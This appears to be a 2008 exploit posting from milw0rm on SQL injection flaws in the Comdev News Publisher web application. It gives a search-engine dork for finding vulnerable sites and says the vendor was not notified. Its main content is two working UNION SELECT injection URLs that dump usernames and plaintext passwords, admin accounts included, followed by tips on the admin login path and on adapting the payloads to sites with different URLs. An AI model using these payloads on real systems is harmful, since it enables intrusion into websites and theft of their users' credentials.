1 −−==+================================================================================+==−−
2 −−==+
Comdev News Publisher SQL Injection Vulnerbilitys
+==−−
3 −−==+================================================================================+==−−
4
5
6
7 Discovered By: t0pP8uZz & xprog
8 Discovered On: 4 April 2008
9 SITE: www.comdevweb.com
10 DORK (altavista.com/google): "Powered by Comdev News Publisher"
11
12 VENDOR Has Not Been Notified!
13
14
15 DESCRIPTION:
16 Comdev News Publisher, suffers from insecure sql querys, which allows malicous users to pull data
17 from the database and view admin/user passwords in plaintext.
18
19
20 EXPLOITS:
21 All Users: www.site.com/index.php?arcyear=−1&arcmonth=−1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password
),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/*
22 Admin: http://site.com/index.php?arcyear=−1&arcmonth=−1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password)
,3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/**/WHERE/**/permission=0x414C4C/*
23
24
25 NOTE/TIP:
26 admin login is located at /oneadmin/
27 some sites use .htm/.html extensions instead of .php and some sites use "main" instead of "index"
28 they do this using a modified htaccess file, no worries the injections will still work just change "index.php"
29 in the above injections.
30
31
32 GREETZ: milw0rm.com, h4ck−y0u.org !
33
34
35
36 −−==+================================================================================+==−−
37 −−==+
Comdev News Publisher SQL Injection Vulnerbilitys
+==−−
38 −−==+================================================================================+==−−
39
40 # milw0rm.com [2008−04−04]
Page 1/1
Comdev News Publisher Remote SQL Injection Vulnerability
t0pP8uZz
04/04/2008